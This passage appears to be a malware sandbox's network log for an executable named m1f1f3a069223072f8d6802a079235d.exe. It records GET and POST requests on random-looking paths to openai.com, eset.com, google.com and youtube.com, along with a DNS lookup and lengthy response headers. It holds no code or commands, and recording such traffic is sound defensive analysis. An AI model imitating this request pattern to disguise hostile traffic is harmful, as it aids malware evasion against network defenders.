      x-azure-ref: 20240410T023002Z-17585d9fd9c2ptd7c8q2exvv500000000440000000004bgm
      X-Cache: CONFIG_NOCACHE
    • flag-us
      GET
      http://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:80
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 307 Temporary Redirect
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Content-Type: text/html
      Content-Length: 0
      Connection: keep-alive
      Location: https://openai.com/MWPpdfCd2G?q=114
      x-azure-ref: 20240410T023002Z-17585d9fd9c2ptd7c8q2exvv500000000440000000004bhd
      X-Cache: CONFIG_NOCACHE
    • flag-sk
      POST
      http://eset.com/No0TnWnOx1?q=0
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      91.228.166.47:80
      Request
      POST /No0TnWnOx1?q=0 HTTP/1.1
      Host: eset.com
      Content-Length: 152
      Expect: 100-continue
      Connection: Keep-Alive
      Response
      HTTP/1.1 301 Moved Permanently
      Server: nginx
      Date: Wed, 10 Apr 2024 02:30:01 GMT
      Content-Type: text/html
      Content-Length: 178
      Connection: close
      Location: https://www.eset.com/No0TnWnOx1?q=0
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
    • flag-us
      GET
      https://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Content-Type: text/html
      Content-Length: 2028
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Cache-Control: no-cache
      Content-Range: bytes 0-2027/2028
      ETag: "41035449"
      Last-Modified: Wed, 10 Apr 2024 00:12:52 GMT
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Referrer-Policy: same-origin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      X-DNS-Prefetch-Control: off
      X-Frame-Options: SAMEORIGIN
      Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' 'unsafe-eval' 'sha256-Fu6BQZHI9lIev81cMzan2gbFLQJijUWL2tHnvhvYP1k=' 'sha256-B9HPo9/jX4atLVuuhcrzSKwMHW+UCXph8cK5JNCTkZM=' https://api.observablehq.com https://cdn.jsdelivr.net https://cdn.openai.com https://unpkg.com https://www.googletagmanager.com https://static.cloudflareinsights.com; style-src 'self' 'unsafe-inline' https://www.gstatic.com https://fonts.googleapis.com https://github.githubassets.com; img-src 'self' data: https: https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://i.vimeocdn.com https://images.openai.com; font-src 'self' data: https://use.typekit.net https://cdn.jsdelivr.net https://fonts.gstatic.com; connect-src 'self' *.google-analytics.com https://region1.google-analytics.com https://cdnmd.global-cache.online https://translate.googleapis.com https://cloudflareinsights.com https://cdn.jsdelivr.net https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://gist.githubusercontent.com https://o33249.ingest.sentry.io https://openaicom-api-bdcpf8c6d2e9atf6.z01.azurefd.net https://static.observableusercontent.com https://www.google-analytics.com; media-src 'self' data: https://translate.google.com https://cdn.openai.com https://openaicomproductionae4b.blob.core.windows.net; object-src 'none'; frame-src 'self' https://vimeo.com https://openaipublic.blob.core.windows.net https://platform.twitter.com https://www.instagram.com https://m.youtube.com https://player.twitch.tv https://player.vimeo.com https://w.soundcloud.com; base-uri 'self'; manifest-src 'self'; report-uri https://oaic.report-uri.com/r/d/csp/reportOnly
      x-azure-ref: 20240410T023002Z-17585d9fd9ckbpbzv4fzhf7spn000000068g000000006d7f
      x-fd-int-roxy-purgeid: 43958466
      X-Cache: TCP_MISS
    • flag-us
      GET
      https://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:30:03 GMT
      Content-Type: text/html
      Content-Length: 2028
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Cache-Control: no-cache
      Content-Range: bytes 0-2027/2028
      ETag: "41035449"
      Last-Modified: Wed, 10 Apr 2024 00:12:52 GMT
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Referrer-Policy: same-origin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      X-DNS-Prefetch-Control: off
      X-Frame-Options: SAMEORIGIN
      Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' 'unsafe-eval' 'sha256-Fu6BQZHI9lIev81cMzan2gbFLQJijUWL2tHnvhvYP1k=' 'sha256-B9HPo9/jX4atLVuuhcrzSKwMHW+UCXph8cK5JNCTkZM=' https://api.observablehq.com https://cdn.jsdelivr.net https://cdn.openai.com https://unpkg.com https://www.googletagmanager.com https://static.cloudflareinsights.com; style-src 'self' 'unsafe-inline' https://www.gstatic.com https://fonts.googleapis.com https://github.githubassets.com; img-src 'self' data: https: https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://i.vimeocdn.com https://images.openai.com; font-src 'self' data: https://use.typekit.net https://cdn.jsdelivr.net https://fonts.gstatic.com; connect-src 'self' *.google-analytics.com https://region1.google-analytics.com https://cdnmd.global-cache.online https://translate.googleapis.com https://cloudflareinsights.com https://cdn.jsdelivr.net https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://gist.githubusercontent.com https://o33249.ingest.sentry.io https://openaicom-api-bdcpf8c6d2e9atf6.z01.azurefd.net https://static.observableusercontent.com https://www.google-analytics.com; media-src 'self' data: https://translate.google.com https://cdn.openai.com https://openaicomproductionae4b.blob.core.windows.net; object-src 'none'; frame-src 'self' https://vimeo.com https://openaipublic.blob.core.windows.net https://platform.twitter.com https://www.instagram.com https://m.youtube.com https://player.twitch.tv https://player.vimeo.com https://w.soundcloud.com; base-uri 'self'; manifest-src 'self'; report-uri https://oaic.report-uri.com/r/d/csp/reportOnly
      x-azure-ref: 20240410T023002Z-17585d9fd9ckbpbzv4fzhf7spn000000068g000000006d7q
      x-fd-int-roxy-purgeid: 43958466
      X-Cache: TCP_MISS
    • flag-us
      GET
      https://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:30:03 GMT
      Content-Type: text/html
      Content-Length: 2028
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Cache-Control: no-cache
      Content-Range: bytes 0-2027/2028
      ETag: "41035449"
      Last-Modified: Wed, 10 Apr 2024 00:12:52 GMT
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Referrer-Policy: same-origin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      X-DNS-Prefetch-Control: off
      X-Frame-Options: SAMEORIGIN
      Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' 'unsafe-eval' 'sha256-Fu6BQZHI9lIev81cMzan2gbFLQJijUWL2tHnvhvYP1k=' 'sha256-B9HPo9/jX4atLVuuhcrzSKwMHW+UCXph8cK5JNCTkZM=' https://api.observablehq.com https://cdn.jsdelivr.net https://cdn.openai.com https://unpkg.com https://www.googletagmanager.com https://static.cloudflareinsights.com; style-src 'self' 'unsafe-inline' https://www.gstatic.com https://fonts.googleapis.com https://github.githubassets.com; img-src 'self' data: https: https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://i.vimeocdn.com https://images.openai.com; font-src 'self' data: https://use.typekit.net https://cdn.jsdelivr.net https://fonts.gstatic.com; connect-src 'self' *.google-analytics.com https://region1.google-analytics.com https://cdnmd.global-cache.online https://translate.googleapis.com https://cloudflareinsights.com https://cdn.jsdelivr.net https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://gist.githubusercontent.com https://o33249.ingest.sentry.io https://openaicom-api-bdcpf8c6d2e9atf6.z01.azurefd.net https://static.observableusercontent.com https://www.google-analytics.com; media-src 'self' data: https://translate.google.com https://cdn.openai.com https://openaicomproductionae4b.blob.core.windows.net; object-src 'none'; frame-src 'self' https://vimeo.com https://openaipublic.blob.core.windows.net https://platform.twitter.com https://www.instagram.com https://m.youtube.com https://player.twitch.tv https://player.vimeo.com https://w.soundcloud.com; base-uri 'self'; manifest-src 'self'; report-uri https://oaic.report-uri.com/r/d/csp/reportOnly
      x-azure-ref: 20240410T023003Z-17585d9fd9ckbpbzv4fzhf7spn000000068g000000006d7s
      x-fd-int-roxy-purgeid: 43958466
      X-Cache: TCP_MISS
    • flag-us
      GET
      https://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:30:03 GMT
      Content-Type: text/html
      Content-Length: 2028
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Cache-Control: no-cache
      Content-Range: bytes 0-2027/2028
      ETag: "41035449"
      Last-Modified: Wed, 10 Apr 2024 00:12:52 GMT
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Referrer-Policy: same-origin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      X-DNS-Prefetch-Control: off
      X-Frame-Options: SAMEORIGIN
      Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' 'unsafe-eval' 'sha256-Fu6BQZHI9lIev81cMzan2gbFLQJijUWL2tHnvhvYP1k=' 'sha256-B9HPo9/jX4atLVuuhcrzSKwMHW+UCXph8cK5JNCTkZM=' https://api.observablehq.com https://cdn.jsdelivr.net https://cdn.openai.com https://unpkg.com https://www.googletagmanager.com https://static.cloudflareinsights.com; style-src 'self' 'unsafe-inline' https://www.gstatic.com https://fonts.googleapis.com https://github.githubassets.com; img-src 'self' data: https: https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://i.vimeocdn.com https://images.openai.com; font-src 'self' data: https://use.typekit.net https://cdn.jsdelivr.net https://fonts.gstatic.com; connect-src 'self' *.google-analytics.com https://region1.google-analytics.com https://cdnmd.global-cache.online https://translate.googleapis.com https://cloudflareinsights.com https://cdn.jsdelivr.net https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://gist.githubusercontent.com https://o33249.ingest.sentry.io https://openaicom-api-bdcpf8c6d2e9atf6.z01.azurefd.net https://static.observableusercontent.com https://www.google-analytics.com; media-src 'self' data: https://translate.google.com https://cdn.openai.com https://openaicomproductionae4b.blob.core.windows.net; object-src 'none'; frame-src 'self' https://vimeo.com https://openaipublic.blob.core.windows.net https://platform.twitter.com https://www.instagram.com https://m.youtube.com https://player.twitch.tv https://player.vimeo.com https://w.soundcloud.com; base-uri 'self'; manifest-src 'self'; report-uri https://oaic.report-uri.com/r/d/csp/reportOnly
      x-azure-ref: 20240410T023003Z-17585d9fd9ckbpbzv4fzhf7spn000000068g000000006d7w
      x-fd-int-roxy-purgeid: 43958466
      X-Cache: TCP_MISS
    • flag-us
      GET
      https://openai.com/MWPpdfCd2G?q=114
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      13.107.246.64:443
      Request
      GET /MWPpdfCd2G?q=114 HTTP/1.1
      Host: openai.com
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 10 Apr 2024 02:30:03 GMT
      Content-Type: text/html
      Content-Length: 2028
      Connection: keep-alive
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Cache-Control: no-cache
      Content-Range: bytes 0-2027/2028
      ETag: "41035449"
      Last-Modified: Wed, 10 Apr 2024 00:12:52 GMT
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Referrer-Policy: same-origin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      X-DNS-Prefetch-Control: off
      X-Frame-Options: SAMEORIGIN
      Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' 'unsafe-eval' 'sha256-Fu6BQZHI9lIev81cMzan2gbFLQJijUWL2tHnvhvYP1k=' 'sha256-B9HPo9/jX4atLVuuhcrzSKwMHW+UCXph8cK5JNCTkZM=' https://api.observablehq.com https://cdn.jsdelivr.net https://cdn.openai.com https://unpkg.com https://www.googletagmanager.com https://static.cloudflareinsights.com; style-src 'self' 'unsafe-inline' https://www.gstatic.com https://fonts.googleapis.com https://github.githubassets.com; img-src 'self' data: https: https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://i.vimeocdn.com https://images.openai.com; font-src 'self' data: https://use.typekit.net https://cdn.jsdelivr.net https://fonts.gstatic.com; connect-src 'self' *.google-analytics.com https://region1.google-analytics.com https://cdnmd.global-cache.online https://translate.googleapis.com https://cloudflareinsights.com https://cdn.jsdelivr.net https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://gist.githubusercontent.com https://o33249.ingest.sentry.io https://openaicom-api-bdcpf8c6d2e9atf6.z01.azurefd.net https://static.observableusercontent.com https://www.google-analytics.com; media-src 'self' data: https://translate.google.com https://cdn.openai.com https://openaicomproductionae4b.blob.core.windows.net; object-src 'none'; frame-src 'self' https://vimeo.com https://openaipublic.blob.core.windows.net https://platform.twitter.com https://www.instagram.com https://m.youtube.com https://player.twitch.tv https://player.vimeo.com https://w.soundcloud.com; base-uri 'self'; manifest-src 'self'; report-uri https://oaic.report-uri.com/r/d/csp/reportOnly
      x-azure-ref: 20240410T023003Z-17585d9fd9ckbpbzv4fzhf7spn000000068g000000006d80
      x-fd-int-roxy-purgeid: 43958466
      X-Cache: TCP_MISS
    • flag-gb
      GET
      https://youtube.com/YggOLR313W?q=26
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      216.58.204.78:443
      Request
      GET /YggOLR313W?q=26 HTTP/1.1
      Host: youtube.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 301 Moved Permanently
      Content-Type: application/binary
      X-Content-Type-Options: nosniff
      Expires: Wed, 10 Apr 2024 02:30:02 GMT
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Cache-Control: private, max-age=31536000
      Location: https://www.youtube.com/YggOLR313W?q=26
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      X-Frame-Options: SAMEORIGIN
      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
      Report-To: {"group":"youtube_main","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube_main"}]}
      Origin-Trial: AvC9UlR6RDk2crliDsFl66RWLnTbHrDbp+DiY6AYz/PNQ4G4tdUTjrHYr2sghbkhGQAVxb7jaPTHpEVBz0uzQwkAAAB4eyJvcmlnaW4iOiJodHRwczovL3lvdXR1YmUuY29tOjQ0MyIsImZlYXR1cmUiOiJXZWJWaWV3WFJlcXVlc3RlZFdpdGhEZXByZWNhdGlvbiIsImV4cGlyeSI6MTcxOTUzMjc5OSwiaXNTdWJkb21haW4iOnRydWV9
      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="youtube_main"
      Server: ESF
      Content-Length: 0
      X-XSS-Protection: 0
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    • flag-gb
      POST
      http://google.com/dIoqxQcxKt?q=2
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      142.250.200.14:80
      Request
      POST /dIoqxQcxKt?q=2 HTTP/1.1
      Host: google.com
      Content-Length: 91
      Expect: 100-continue
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=UTF-8
      Referrer-Policy: no-referrer
      Content-Length: 1571
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Connection: close
    • flag-gb
      POST
      http://google.com/dIoqxQcxKt?q=2
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      142.250.200.14:80
      Request
      POST /dIoqxQcxKt?q=2 HTTP/1.1
      Host: google.com
      Content-Length: 91
      Expect: 100-continue
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=UTF-8
      Referrer-Policy: no-referrer
      Content-Length: 1571
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Connection: close
    • flag-us
      DNS
      www.eset.com
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      8.8.8.8:53
      Request
      www.eset.com
      IN A
      Response
      www.eset.com
      IN CNAME
      www-eset-com.trafficmanager.net
      www-eset-com.trafficmanager.net
      IN CNAME
      www.eset.com.edgesuite.net
      www.eset.com.edgesuite.net
      IN CNAME
      a1281.dscr.akamai.net
      a1281.dscr.akamai.net
      IN A
      104.117.77.144
      a1281.dscr.akamai.net
      IN A
      104.117.77.121
    • flag-sk
      POST
      http://eset.com/No0TnWnOx1?q=0
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      91.228.166.47:80
      Request
      POST /No0TnWnOx1?q=0 HTTP/1.1
      Host: eset.com
      Content-Length: 152
      Expect: 100-continue
      Response
      HTTP/1.1 301 Moved Permanently
      Server: nginx
      Date: Wed, 10 Apr 2024 02:30:02 GMT
      Content-Type: text/html
      Content-Length: 178
      Connection: close
      Location: https://www.eset.com/No0TnWnOx1?q=0
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
    • flag-be
      GET
      https://www.eset.com/No0TnWnOx1?q=0
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      104.117.77.144:443
      Request
      GET /No0TnWnOx1?q=0 HTTP/1.1
      Host: www.eset.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 301 Moved Permanently
      Content-Type: text/html
      Content-Length: 162
      Location: https://www.eset.com/No0TnWnOx1/?q=0
      Referrer-Policy: no-referrer-when-downgrade
      Feature-Policy: accelerometer 'none'; camera 'none'; geolocation 'none'; gyroscope 'none'; magnetometer 'none'; microphone 'none'; payment 'none'; usb 'none'; ambient-light-sensor 'none'; autoplay 'none'; encrypted-media 'none'; fullscreen 'self' https://www.youtube.com; midi 'none'; picture-in-picture 'none'; speaker 'none'; vr 'none'
      X-Frame-Options: SAMEORIGIN
      X-XSS-Protection: 1; mode=block; report=https://eset.report-uri.com/r/d/xss/enforce
      X-Content-Type-Options: nosniff
      Access-Control-Allow-Origin: https://www.eset.com
      Content-Security-Policy: default-src 'self'; connect-src 'self' http://ad.doubleclick.net https://*.analytics.google.com https://*.api.userway.org https://*.clarity.ms https://*.demdex.net https://*.eset.com https://*.googlesyndication.com https://*.hotjar.com https://*.hotjar.io https://*.tt.omtrdc.net https://adservice.google.com https://analytics.google.com https://analytics.twitter.com https://bat.bing.com https://c.go-mpulse.net https://cdn.acsbapp.com https://cdn.linkedin.oribi.io https://cdn1.esetstatic.com https://cookies-data.onetrust.io https://ep.smct.co https://eset.tt.omtrdc.net https://geolocation.onetrust.com https://googleads.g.doubleclick.net https://ipb.smct.co https://ipb.smct.io https://js.smct.co https://js.smct.io https://maps.googleapis.com https://privacyportal.onetrust.com https://px.ads.linkedin.com https://region1.google-analytics.com https://replay.uxtweak.com https://s.yimg.com https://script.crazyegg.com https://smct.co https://stats.g.doubleclick.net https://tracker.clickguard.com https://www.facebook.com https://www.g2.com https://www.google-analytics.com https://www.google.by https://www.google.ch https://www.google.co.uk https://www.google.co.uz https://www.google.com https://www.google.com.tj https://www.google.com.tr https://www.google.ie https://www.google.kg https://www.google.kz https://www.google.lt https://www.google.lv https://www.google.pl https://www.google.ru https://www.googletagmanager.com wss://*.hotjar.com; font-src 'self' data: https://cdn.userway.org https://fonts.smct.co https://fonts.smct.io https://script.hotjar.com; frame-src 'self' https://*.fls.doubleclick.net https://8117415.fls.doubleclick.net https://bid.g.doubleclick.net https://download.eset.com https://eset.demdex.net https://hemsync.clickagy.com https://int.form.eset.com https://js.smct.io https://ls.smct.co https://protectdemo.eset.com https://smct.co https://td.doubleclick.net https://tpc.googlesyndication.com https://unity.survey-solutions.cloud https://vars.hotjar.com https://widget.trustpilot.com https://www.facebook.com https://www.google.com https://www.googletagmanager.com https://www.youtube-nocookie.com https://www.youtube.com; img-src 'self' data: http://ad.doubleclick.net https://*.adform.net https://*.ads.linkedin.com https://*.yahoo.co.jp https://ad.doubleclick.net https://ade.googlesyndication.com https://adservice.google.at https://adservice.google.ch https://adservice.google.co.jp https://adservice.google.com https://adservice.google.de https://analytics.google.com https://analytics.twitter.com https://bat.bing.com https://c.bing.com https://c.clarity.ms https://captcha.eset.com https://cdn.esetstatic.com https://cdn.jsdelivr.net https://cdn.smct.co https://cdn.smct.io https://cdn1.esetstatic.com https://cm.everesttech.net https://cm.g.doubleclick.net https://connect.facebook.net https://dc.ads.linkedin.com https://dpm.demdex.net https://events.smct.co https://googleads.g.doubleclick.net https://i.ytimg.com https://images.g2crowd.com https://maps.googleapis.com https://pagead2.googlesyndication.com https://pubads.g.doubleclick.net https://px.ads.linkedin.com https://region1.analytics.google.com https://region1.google-analytics.com https://script.hotjar.com https://sgtm.eset.com https://ssitecat.eset.com https://ssl.google-analytics.com https://static.hotjar.com https://stats.g.doubleclick.net https://t.co https://tribl.io https://www.facebook.com https://www.google-analytics.com https://www.google.ad https://www.google.ae https://www.google.al https://www.google.am https://www.google.at https://www.google.az https://www.google.ba https://www.google.be https://www.google.bf https://www.google.bg https://www.google.bi https://www.google.bj https://www.google.bs https://www.google.bt https://www.google.by https://www.google.ca https://www.google.cd https://www.google.cf https://www.google.cg https://www.google.ch https://www.google.ci https://www.google.cl https://www.google.cm https://www.google.cn https://www.google.co.ao https://www.google.co.bw https://www.google.co.cr https://www.google.co.id https://www.google.co.il https://www.google.co.in https://www.google.co.jp https://www.google.co.ke https://www.google.co.kr https://www.google.co.ls https://www.google.co.ma https://www.google.co.mz https://www.google.co.nz https://www.google.co.th https://www.google.co.tz https://www.google.co.ug https://www.google.co.uk https://www.google.co.uz https://www.google.co.ve https://www.google.co.vi https://www.google.co.za https://www.google.co.zm https://www.google.co.zw https://www.google.com https://www.google.com.af https://www.google.com.ag https://www.google.com.ar https://www.google.com.au https://www.google.com.bd https://www.google.com.bh https://www.google.com.bn https://www.google.com.bo https://www.google.com.br https://www.google.com.bz https://www.google.com.co https://www.google.com.cu https://www.google.com.cy https://www.google.com.do https://www.google.com.ec https://www.google.com.eg https://www.google.com.et https://www.google.com.fj https://www.google.com.gh https://www.google.com.gi https://www.google.com.gt https://www.google.com.hk https://www.google.com.jm https://www.google.com.kh https://www.google.com.kw https://www.google.com.lb https://www.google.com.ly https://www.google.com.mm https://www.google.com.mt https://www.google.com.mx https://www.google.com.my https://www.google.com.na https://www.google.com.ng https://www.google.com.ni https://www.google.com.np https://www.google.com.om https://www.google.com.pa https://www.google.com.pe https://www.google.com.pg https://www.google.com.ph https://www.google.com.pk https://www.google.com.pr https://www.google.com.py https://www.google.com.qa https://www.google.com.sa https://www.google.com.sb https://www.google.com.sg https://www.google.com.sl https://www.google.com.sv https://www.google.com.tj https://www.google.com.tr https://www.google.com.tw https://www.google.com.ua https://www.google.com.uy https://www.google.com.vc https://www.google.com.vn https://www.google.cv https://www.google.cz https://www.google.de https://www.google.dj https://www.google.dk https://www.google.dm https://www.google.dz https://www.google.ee https://www.google.es https://www.google.fi https://www.google.fr https://www.google.ga https://www.google.ge https://www.google.gg https://www.google.gl https://www.google.gm https://www.google.gr https://www.google.gy https://www.google.hn https://www.google.hr https://www.google.ht https://www.google.hu https://www.google.ie https://www.google.im https://www.google.iq https://www.google.is https://www.google.it https://www.google.je https://www.google.jo https://www.google.kg https://www.google.ki https://www.google.kz https://www.google.la https://www.google.li https://www.google.lk https://www.google.lt https://www.google.lu https://www.google.lv https://www.google.md https://www.google.me https://www.google.mg https://www.google.mk https://www.google.ml https://www.google.mn https://www.google.mu https://www.google.mv https://www.google.mw https://www.google.ne https://www.google.nl https://www.google.no https://www.google.nr https://www.google.pl https://www.google.ps https://www.google.pt https://www.google.ro https://www.google.rs https://www.google.ru https://www.google.rw https://www.google.sc https://www.google.se https://www.google.si https://www.google.sk https://www.google.sm https://www.google.sn https://www.google.so https://www.google.sr https://www.google.td https://www.google.tg https://www.google.tl https://www.google.tm https://www.google.tn https://www.google.tt https://www.google.vg https://www.google.vu https://www.googleadservices.com https://www.googletagmanager.com https://www.hotjar.com https://www.linkedin.com; manifest-src 'none'; media-src 'self'; object-src 'self'; prefetch-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline' https://*.replay.uxtweak.com https://*.salesforceliveagent.com https://acsbap.com https://acsbapp.com https://assets.esetstatic.com https://bat.bing.com https://cdn.esetstatic.com https://cdn.jsdelivr.net https://cdn.linkedin.oribi.io https://cdn1.esetstatic.com https://cdnjs.cloudflare.com https://connect.facebook.net https://d.la1-c2-cdg.salesforceliveagent.com https://embed.tawk.to https://googleads.g.doubleclick.net https://img06.en25.com https://invitejs.trustpilot.com https://js.smct.co https://js.smct.io https://maps.googleapis.com https://nowexttype.com https://pagead2.googlesyndication.com https://platform.twitter.com https://s786665.t.eloqua.com https://script.hotjar.com https://sgtm.eset.com https://smct.co https://snap.licdn.com https://ssl.google-analytics.com https://static.ads-twitter.com https://static.hotjar.com https://store.eset.com https://tpc.googlesyndication.com https://tribl.io https://widget.trustpilot.com https://www.clarity.ms https://www.google-analytics.com https://www.google.ae https://www.google.am https://www.google.at https://www.google.be https://www.google.bg https://www.google.bs https://www.google.by https://www.google.ca https://www.google.cg https://www.google.ch https://www.google.ci https://www.google.cl https://www.google.cm https://www.google.co.id https://www.google.co.il https://www.google.co.in https://www.google.co.jp https://www.google.co.ke https://www.google.co.ma https://www.google.co.nz https://www.google.co.th https://www.google.co.uk https://www.google.co.uz https://www.google.co.ve https://www.google.co.za https://www.google.co.zw https://www.google.com https://www.google.cz https://www.google.de https://www.google.dj https://www.google.dz https://www.google.ee https://www.google.es https://www.google.fi https://www.google.fr https://www.google.ge https://www.google.gr https://www.google.hr https://www.google.hu https://www.google.ie https://www.google.kg https://www.google.kz https://www.google.lk https://www.google.lt https://www.google.md https://www.google.me https://www.google.mk https://www.google.nl https://www.google.pl https://www.google.ps https://www.google.pt https://www.google.ro https://www.google.ru https://www.google.se https://www.google.si https://www.google.sk https://www.google.tn https://www.googleadservices.com https://www.googleoptimize.com https://www.googletagmanager.com https://www.youtube.com; style-src 'self' 'unsafe-inline' https://cdn.jsdelivr.net https://fonts.smct.co https://fonts.smct.io https://script.hotjar.com https://static.hotjar.com; worker-src 'self'; report-uri https://www-eset-com.api.cspconsole.com/v1/csp/report; report-to default;
      Report-To: {"group":"default","max_age":31536000,"endpoints":[{"url":"https://www-eset-com.api.cspconsole.com/v1/csp/report"}],"include_subdomains":false}
      X-EDPS-Request-Status: normal
      Strict-Transport-Security: max-age=15724800
      Cache-Control: public, max-age=86351
      Date: Wed, 10 Apr 2024 02:30:03 GMT
      Connection: keep-alive
    • flag-be
      GET
      https://www.eset.com/No0TnWnOx1/?q=0
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      104.117.77.144:443
      Request
      GET /No0TnWnOx1/?q=0 HTTP/1.1
      Host: www.eset.com
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=utf-8
      Referrer-Policy: no-referrer-when-downgrade
      Feature-Policy: accelerometer 'none'; camera 'none'; geolocation 'none'; gyroscope 'none'; magnetometer 'none'; microphone 'none'; payment 'none'; usb 'none'; ambient-light-sensor 'none'; autoplay 'none'; encrypted-media 'none'; fullscreen 'self' https://www.youtube.com; midi 'none'; picture-in-picture 'none'; speaker 'none'; vr 'none'
      X-Frame-Options: SAMEORIGIN
      X-XSS-Protection: 1; mode=block; report=https://eset.report-uri.com/r/d/xss/enforce
      X-Content-Type-Options: nosniff
      Access-Control-Allow-Origin: https://www.eset.com
      Content-Security-Policy: default-src 'self'; connect-src 'self' http://ad.doubleclick.net https://*.analytics.google.com https://*.api.userway.org https://*.clarity.ms https://*.demdex.net https://*.eset.com https://*.googlesyndication.com https://*.hotjar.com https://*.hotjar.io https://*.tt.omtrdc.net https://adservice.google.com https://analytics.google.com https://analytics.twitter.com https://bat.bing.com https://c.go-mpulse.net https://cdn.acsbapp.com https://cdn.linkedin.oribi.io https://cdn1.esetstatic.com https://cookies-data.onetrust.io https://ep.smct.co https://eset.tt.omtrdc.net https://geolocation.onetrust.com https://googleads.g.doubleclick.net https://ipb.smct.co https://ipb.smct.io https://js.smct.co https://js.smct.io https://maps.googleapis.com https://privacyportal.onetrust.com https://px.ads.linkedin.com https://region1.google-analytics.com https://replay.uxtweak.com https://s.yimg.com https://script.crazyegg.com https://smct.co https://stats.g.doubleclick.net https://tracker.clickguard.com https://www.facebook.com https://www.g2.com https://www.google-analytics.com https://www.google.by https://www.google.ch https://www.google.co.uk https://www.google.co.uz https://www.google.com https://www.google.com.tj https://www.google.com.tr https://www.google.ie https://www.google.kg https://www.google.kz https://www.google.lt https://www.google.lv https://www.google.pl https://www.google.ru https://www.googletagmanager.com wss://*.hotjar.com; font-src 'self' data: https://cdn.userway.org https://fonts.smct.co 